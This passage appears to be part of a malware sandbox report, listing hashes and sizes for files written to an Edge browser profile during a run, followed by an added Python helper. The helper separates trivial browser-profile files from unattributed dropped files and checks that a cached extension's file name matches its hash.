SHA1: 3d9fa5cc36e2bf3cfefeb84a359040628ac05d32
SHA256: b202fbf52d09ec5178b4c4a410fe9cc0728a3e7886a5c8c825ede2bd7e30955a
SHA512: f13f3b167e7359182e31143aa23198dc25f3899aa71758a98571934de11d0bacdb1388f93932f7fd1895dee414079386c588e9c172d3b454b7af940954c6b591
-
Filesize: 2B
MD5: d751713988987e9331980363e24189ce
SHA1: 97d170e1550eee4afc0af065b78cda302a97674c
SHA256: 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512: b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize: 40B
MD5: 20d4b8fa017a12a108c87f540836e250
SHA1: 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256: 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512: 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
Filesize: 19KB
MD5: 15456c0e9e99303b886b7054147b9792
SHA1: 0e3c4976dc35cf03952cb71dad2754c18b023a9b
SHA256: 61ca7583103c9963ecac22b8c5be4e431b4a03ca0a83fb1984d1bb8d2439b7ee
SHA512: 0e8de26cdea35dd5981b0519b514d0d07ba9c1888ebc2a07286fb721896ec62700598e6036ea8a5245e07422019190c4dd247e6705c7671da926784907f76e99
-
Filesize: 24KB
MD5: 6b3ef4d4af10624d7d79ee2a64144b36
SHA1: 62e7cdb46baf99780d90d49f01b4986ce55ee2d9
SHA256: b596e1bee1b9df4dcedbd40e613689f60d4e8019b66a1cb985823c1e534875d2
SHA512: 330ed7bbc09adf7db2d321fcbb2cabf02781e05881d2623868320f9490f9ff82377db869df4e718485858b62ec05c016b08d03b2015b266bba67dfc5819eec62
-
Filesize: 19KB
MD5: 70cf388bfb224f13bbda5aa2259b9555
SHA1: 5143b80847e134dd3e156e77d1965b34c33a3bf8
SHA256: 460ef5b61a16c8f79dc75a139a7094a4e23de2be9c939c5a23581a806eb24db3
SHA512: f034eaf35761bfd620ef94144cc489d2232a1d996262efc04790dabe5bc3a3ca0e1962c8051255b2c8b782811ee605954d20748b90be2544bba1e8650f4ff20b
-
Filesize: 36KB
MD5: c068467b0f8a192d0bc21534cc1cd5a2
SHA1: 62d2ef721469d357ba7fb4d76f7de636add6605c
SHA256: 03caa628b0052260a068cf5cf88e478ecf44cd2cec978a740f179545e939a145
SHA512: e5febfa10ef2cbccae310691e1aca3bd95fd804aa2230cad32598d8aa51921072678734ef2bb54509e67727d1856dd77c918b1c179c8c775228d6faddff70f1e
-
Filesize: 338B
MD5: 780011c229d086a700f108aece7f2ecc
SHA1: f169eaace2e4ded113b886995474f172beba54b0
SHA256: 735bb2271114bc0faab70fdb7f2645236e2d341c1d978ce59d99b9f740668da4
SHA512: 9631eecaf17bd59dc212864a406a86d825c5e887c5595303d067e3aff13471ac60b3d48b1c74b0e74ff8d38f1cdb624437b3c385b46a9e32fe88a05917e84886
-
Filesize: 347B
MD5: 1464f3d0dc3d4ccf0dd69d764502f0f7
SHA1: 089e24b41888bb17c293c3423b796234f69c5b90
SHA256: f4aa2bd531ea193b23fa841dff1f4de9038e58b4eec5d66bf28b2ee9cc31a17c
SHA512: 1168493b8c8b7fafc4439e93926aeb1bb445df6e88b7ce01b1b8594c8e6908fe826b00dc7cb04ae247919dcdb02faa15718a2527775e11a117e283970ead9dca
-
Filesize: 326B
MD5: ed236d6575f8011412f6351562b1b8b0
SHA1: 38c27e928ac95be7145c4dcdc2677bf9cdf7fc00
SHA256: 8079efb1a004df3ac4a9a669075a157f384039046d55f3ba940da47f440ebed2
SHA512: 65ad571e3401702ea7859192e250a8183978790e79cba83885e93a37a126c107b3fd23ba96e97bda9721fff1319347bd9fb9e9fabe3b3967b9ab3a414e9729d1
-
Filesize: 22KB
MD5: ed9025915b4d450eb78e3f8a4194c10a
SHA1: 270f3b7b7d6e86f28124b10665f3761ce48076c1
SHA256: f096f01bfe6438965d0a9677ca8c000f4cd736ef8a9c74c5425f6808307b1332
SHA512: 4e4d61df1eb338799057461dd9fd256ee1ca84678629457d96f5dcabd7337acc4dcc9f93ca2085f41b5a41021c092c253d547af9e75420ed0df4ee9378a1115f
-
Filesize: 128KB
MD5: 2fa8f38fc092da1f08851e0f43f21655
SHA1: b28f702cc5c141be03c5b90b5d9a19ec32ca669f
SHA256: 522358b7bcfc84b165a51bffb00395fbcee4dffb7d91fd838273d4b2b1985e2b
SHA512: 1aa08e61467d1b6630b42274c4144aa4bae7a7c65403f868b7f1bdeddae7822807f43d06ff62ace56a3870222519d279823bf9aa3cf9a39cf017fad735d94104
-
Filesize: 465B
MD5: 703f50ff899cd3158fb1eb485426316f
SHA1: 8ca19e27c521882065e4effbea01260a60ed216f
SHA256: 21d77f1e260c43b896432db56a6a01672c722d1f2c9df657261d3bef0f91f5fb
SHA512: b085ea0866bdc1d602c3c8fcbb8c2a1db072c636e8ebc29e2b0c8490691cb46500b03518e55edf98ad569cf6638ddfa88ecc4fc9b684ac25340fd51c330448ca
-
Filesize: 898B
MD5: c26d9900111e591c07216585169bc512
SHA1: 6b648672a7b3aaf67f321d6b76971f02914f4bdb
SHA256: f575a05e567822525657b1f403334c1f678e243444583885a867a268c5135c6d
SHA512: 36227a84068cf1a8c85a0e75e625a8aa8c804d5424ced7dc23cc15117b746d871ffc618f749f0df317fee8592f4f75ed6899f49987e23ee77fa5652cfb2bd518
-
Filesize: 23KB
MD5: c1119eb3263ea787ebd59d8932d3a59d
SHA1: 3fc9124fe21145152a35c08f47893d5e2c540032
SHA256: 49e076ec450b8f8f0fa26691457d218df6d1b4fff9220a5023cc91076ae2d7f1
SHA512: 11641d505b15446ae6670dfd8bbad8eb7edbd0bcdc342243c058bf0f4e872a84e4f74afec16be50874c3c1b9d36a2505f341196dea5b46c796f1b66b210428ea
-
Filesize: 22KB
MD5: 3f8927c365639daa9b2c270898e3cf9d
SHA1: c8da31c97c56671c910d28010f754319f1d90fa6
SHA256: fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2
SHA512: d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72
-
Filesize: 13B
MD5: 3e45022839c8def44fd96e24f29a9f4b
SHA1: c798352b5a0860f8edfd5c1589cf6e5842c5c226
SHA256: 01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd
SHA512: 2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9
-
Filesize: 54KB
MD5: 3d77be4e6fb0f8a3c56d9c92f75238f5
SHA1: e90d47a05d3fe08d2d470f9a9eca074a9e3d3e05
SHA256: 870a8545b4b771c55b292d0f1211ac5854c8271c7d40c6346d97acc0b06ebc32
SHA512: f15204efb70fdfcfaf329c79640e5764710c13369c29152ee3c37ae7e9a6aa0e4b870b52939b3f7b484398caffd00a0712cceaa8125974f3e1da23d62cc04cf6
-
Filesize: 60KB
MD5: cf78923b1061eb5c2425ab720d52f025
SHA1: f1d2b9e827c4aeed8e74926ab7f2f8e773c4ce20
SHA256: 55329a3f6fa53319f94ae1beda9da4cd32ecace3f132065e90b8713dd0a27480
SHA512: 04728ffb7576a1e3caf252323a137c62bac1f346cea5dcc2819554ec5b7b37a9599f5c69e2e99ad48d86e32c95f7bce0964fe6f5753d5f7645585c48e819c9d1
-
Filesize: 54KB
MD5: 8afaaea552ecbc45e03f751611272c18
SHA1: 8b038e38ee52b080fbc0424c7afe720a6044be77
SHA256: 71924716e2eb2afb5946370bb9e2941051a338765ac99b8e7dbb54afcb92f822
SHA512: 83f328e1e874c2b40155e68873dc6b0096ae335fd2c69d5c71fe177e85aec3e509c4af16460c1741b31b2d6dd02b239e909380bb30a4d1411e55accc22190509
-
Filesize: 48KB
MD5: 537262650d4221699a6180d3ce84fdb3
SHA1: 5cafcd2d37a20431bd9d986d35b9038e76d26188
SHA256: aa0b30c4cfacb932a93fff721cd57a57647016b2564af660eca00f2b8c90efb2
SHA512: 9dbe72d03c0d36d9e82b256afaa4cd454d9f97547c90f1f3313c624bbfb30fdf195bc7b90122470f4eab6e62434ffa78569118d2200cb81f0d77c0c0271b0a91
-
Filesize: 39KB
MD5: d96dd443513e4309f4f3944b61a8d1c1
SHA1: dbefb726f1a23b2793ddceb8b28daa469b85a45f
SHA256: e54750ee8dcad9bfd302c17aac33de2b7f739465a93173eb05b18723e00a15cb
SHA512: b1e72d4eb8a521c342cd3bc7dd9df665146b1fc927fa2a76a84817efcc7df756c01e13278327b80587a24e9a5c4351055de67597f28c122da21f62c01d1acc86
-
Filesize: 48KB
MD5: c416f81c37e0f72d4746edf9a89bbc54
SHA1: 8ec3b2170d409e02239b75a5c5405f66b98dca13
SHA256: 0d6758e7fb9e6c1326868a83af435ac7575ae538cf6c41544f595290a9ca2c37
SHA512: a525cdca6ea1e64f5c1d229cbe01653068e21c416592ce29641c86ac090388e905c0169ffb15c55e8781d49d765175a64637957b69757824ca3826a806c1b38e
-
Filesize: 60KB
MD5: fe437529e0ecb65f8ea2cc50daea3899
SHA1: 2faeeef44602621742c2fb9a90bc1517c1e0c29b
SHA256: b05940392ccaa815aac800b3aa86a381c617054e3c4bfe121a437bab36dd6789
SHA512: b3b85b83e73227162f6f5324f0b4aa9ac45919dbb81367e3545ab60a770f9a15984de3a9da279d5c873788e5db4e9ae3e15cea981ab0cef18742d0a74c0f7080
-
Filesize: 53KB
MD5: 90a5606583dbb1614bf2b8c9918acfa6
SHA1: ecb19923d93c48dbd53eeb222f373802c8a13970
SHA256: 2664189f9ea49ef5dc74af1c36f02a882d371aca227ecff651a43ecccc943f5d
SHA512: d96814eccabaaf7177e31a34e2999a319da291c7c1ee4f88321947d5a083e35056f3cd7246afdad59e4f34be36262a0a4d75f114b1fd6e9ae1ea561cbfb37a4b
-
Filesize: 264KB
MD5: 3d446ab117aad530e6c654ca79e2b4c9
SHA1: 41783e7a60b076d961d56ce92586bdb393dcacd5
SHA256: af6bd4eed84a3e7c68d45b48c3c69b7db4caa27529bd7649b5e3b94630b3976d
SHA512: 4a3eedf24363f02efd4447981fc6c8ddebaf8bc578e89a9e3d49c0492532257469bbc4766d9b8728dfa27afc230a367251c870d05e95a3d36e189dd154cbc526
-
Filesize: 86B
MD5: 961e3604f228b0d10541ebf921500c86
SHA1: 6e00570d9f78d9cfebe67d4da5efe546543949a7
SHA256: f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
SHA512: 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60
Filesize: 153KB
MD5: b0917d8e6c5b6be358bff67f84eb8336
SHA1: a6e221edcb19a1cc81575b4ddd927fd9a6fbdd6d
SHA256: dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60
SHA512: cd5822bbf91e8f7f5ab2b471a4bf8b464bde95465e2fccc6a57e5a287ca55d5062bdd6d4b3cd76f8529ee7a9081b6a7aad7dc2a7581c344ce4fd2d3256bdf451
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize: 2KB
MD5: b743dd6e1e37d10331d4de4da799a788
SHA1: c9f108a917b1dfc6a55079b09fc3fe541f94a000
SHA256: 2df81482ae971725928b1c252020dda4df151cc0d17d1fb00180c8df7a3d8e61
SHA512: 66b4372bd6b1d3256e9a8e57274493df6a8b4d54c2ffb0f893b15fa875f2f3c30921e13298d5bb1edc834e9c5d2e0d0062c3ab70e7b2452fa1e80efc752e92bd
-
Filesize: 1KB
MD5: 181bdc50407bf93657f4a846cc6cd613
SHA1: 36078691dedef93c030b0b2d1b66ffbae34a536a
SHA256: e925db843a8bd0fa1b05c769f3cb24089f6fe9997a5411ac2e6a8ae15af5ee63
SHA512: 94c0e4298636e1e21f6f69bb320dbe5ea4f34bded1988f7292502b9aba926fed5fe34258b4296ca13b092795feee5b95369f354033d3931d34930cb048e06849
-
Filesize: 1KB
MD5: 04d926e920daa8edf6cd17ea77dce267
SHA1: f944b3805e290fc6eafee7658fedab9b90d8fdbd
SHA256: e5b5aba68bdaf1614dfb3fd48b99452a0c7f096f05542d5b1f71e7fd73235379
SHA512: 4d3a35178273656335f2072aa92a09bd8eef3d8f366fd4a36e81d638a4fd4be2a296f0b388ce8eb64f50604e018a7ba434afb0e71ba0da82e325e235ca225c9d
-
Filesize: 1KB
MD5: e26e403816be0b5fca11ea013456c7a8
SHA1: 2d6708815cc44fb5381e22253714e447c6fe683f
SHA256: 7cdfc0addfbe865ac74595ecb178fae604e83fcfbdc91b09646aadbb9b31d89b
SHA512: 08928269fd35753be0e20f534f9af27441a5e7a901248c77c4627c3b6fc626cd9d4f4fc60e009d4a843987e69376953073834e9f36ced3415b0f44ff16bde7f5
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 190B
MD5: 4f82245a7a697114c52993b33e0d7e17
SHA1: 35777a662a7bc4d11ec707ea8f4c9e4ea76d6f8c
SHA256: 14f48c464ca2f67403f96d9e1a802f3fef062e68aea24c36abf51bf0e038010f
SHA512: 59021c09bfb8405d5a8448c4d9adbac9b98af8b088cbad6cef2ae9018823e52fd4690f63bce652409ef5b385d1a63a69c20629278e172c988910ac0f22cc6020
-
Filesize: 369B
MD5: 019c97092f2887dd7be96fd93f88159b
SHA1: 5db99c00e4657cf2648c09fa16f70a2fbada2337
SHA256: d7671dacd6c78a9b00a7ee88261d576cbfc5edb79dbd0d5365996c69f919c4b2
SHA512: 90978f369f3d7c6ddfa5547be96a8c400bd9eaa42fdc8f01ef5bf12629110e88b97585f3a9a395b9283b7d8708c4cbba0151b84f92d98aaff9cc10142df2e6d0
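Most of the list above is Edge profile churn recorded because the sample was delivered through a browser download page, and the useful entries are the ones with no recorded path and a non-trivial size. The following Python is an added triage helper, not part of the sandbox report: it recomputes the digests of contents that recur in browser profiles (a lone `.` and the empty JSON documents `{}` and `[]`; the 1-byte and 2-byte entries above are exactly those), checks that an extensions_crx_cache file name embeds the file's own SHA256 as the entry above shows (ghbmnnjooekpmoecnnnilnnbdlolhkhi is the ID of Google's Docs Offline extension), and ranks what remains by size so the unattributed 8.0MB and 520KB entries surface first as the files to pull from the sandbox. ENTRIES is a transcribed subset of the list; the verdict strings are this example's own, and the byte counts are approximate because the report prints rounded sizes.

```python
"""Triage a sandbox "Downloads" hash list: separate browser-profile noise from
files worth pulling. Added example, not part of the sandbox report."""
import hashlib
import re

# (path or None, size as printed, md5, sha1, sha256), transcribed from the list above.
# A subset only; the remaining entries have the same shape.
ENTRIES = [
    (r"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\60ef4b21-9300-4ed9-8ef6-b64d7514b364.tmp",
     "1B", "5058f1af8388633f609cadb75a75dc9d", "3a52ce780950d4d969792a2559cd519d7ee8c727",
     "cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8"),
    (None, "2B", "99914b932bd37a50b983c5e7c90ae93b", "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f",
     "44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a"),
    (None, "2B", "d751713988987e9331980363e24189ce", "97d170e1550eee4afc0af065b78cda302a97674c",
     "4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945"),
    (None, "8.0MB", "e9122de20589855e9b8f3dd1f03fb6b2", "309046468630758be927857fa4f7f1f05f8d265b",
     "c98798142aef34e3e7b3d0cb863a598cc20660bbeb3d8771f0c32529ccfb7cee"),
    (None, "520KB", "3984094cc81f436705429ed63ebbfa3b", "59d9989298a826912387ccc6e6ce3f4d7e8d9a9f",
     "46a8361584e71613d8a6a3f3e850458a09ce8fef4a35917fceb77d51ad80397b"),
    (r"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60",
     "153KB", "b0917d8e6c5b6be358bff67f84eb8336", "a6e221edcb19a1cc81575b4ddd927fd9a6fbdd6d",
     "dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60"),
]

# Contents whose digests recur in browser profiles: a lone ".", empty JSON "{}" / "[]".
TRIVIAL_CONTENTS = {b".": "single '.'", b"{}": "empty JSON object", b"[]": "empty JSON array"}

_SIZE_RE = re.compile(r"^(\d+(?:\.\d+)?)(B|KB|MB|GB)$")
_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}
_CRX_NAME_RE = re.compile(r"^[a-p]{32}_.+\.([0-9a-f]{64})$")


def size_to_bytes(size):
    """Convert a printed size such as '8.0MB' to bytes (approximate: the report rounds)."""
    m = _SIZE_RE.match(size)
    if not m:
        raise ValueError(f"unrecognised size {size!r}")
    return int(float(m.group(1)) * _UNITS[m.group(2)])


def trivial_content(md5, sha1, sha256):
    """Label for a known trivial content, or None. All three digests must agree,
    so a single mistyped digest cannot mislabel a real file as noise."""
    for content, label in TRIVIAL_CONTENTS.items():
        if (hashlib.md5(content).hexdigest() == md5
                and hashlib.sha1(content).hexdigest() == sha1
                and hashlib.sha256(content).hexdigest() == sha256):
            return label
    return None


def crx_cache_name_matches(path, sha256):
    """True/False when the file name is an extensions_crx_cache entry
    (<extension-id>_<version>.<sha256 of the file>), None otherwise."""
    if path is None:
        return None
    m = _CRX_NAME_RE.match(path.rsplit("\\", 1)[-1])
    return None if m is None else m.group(1) == sha256


def triage(entries):
    """Return [(verdict, approx_bytes, sha256)], largest first."""
    out = []
    for path, size, md5, sha1, sha256 in entries:
        nbytes = size_to_bytes(size)
        label = trivial_content(md5, sha1, sha256)
        crx = crx_cache_name_matches(path, sha256)
        if label:
            verdict = f"noise: {label}"
        elif crx is True:
            verdict = "browser CRX cache (name matches SHA256)"
        elif crx is False:
            verdict = "CRX cache name/hash MISMATCH: inspect"
        elif path is None:
            verdict = "unattributed: pull sample"
        else:
            verdict = "attributed file: review path"
        out.append((verdict, nbytes, sha256))
    return sorted(out, key=lambda t: -t[1])


if __name__ == "__main__":
    for verdict, nbytes, sha256 in triage(ENTRIES):
        print(f"{nbytes:>9} {sha256[:16]}  {verdict}")
```

Checking all three digests before calling something noise costs nothing and guards against the one transcription error that would otherwise turn a real dropped file into a dismissed one; the same three-way comparison is what you would run against a vendor's "known clean" hash set.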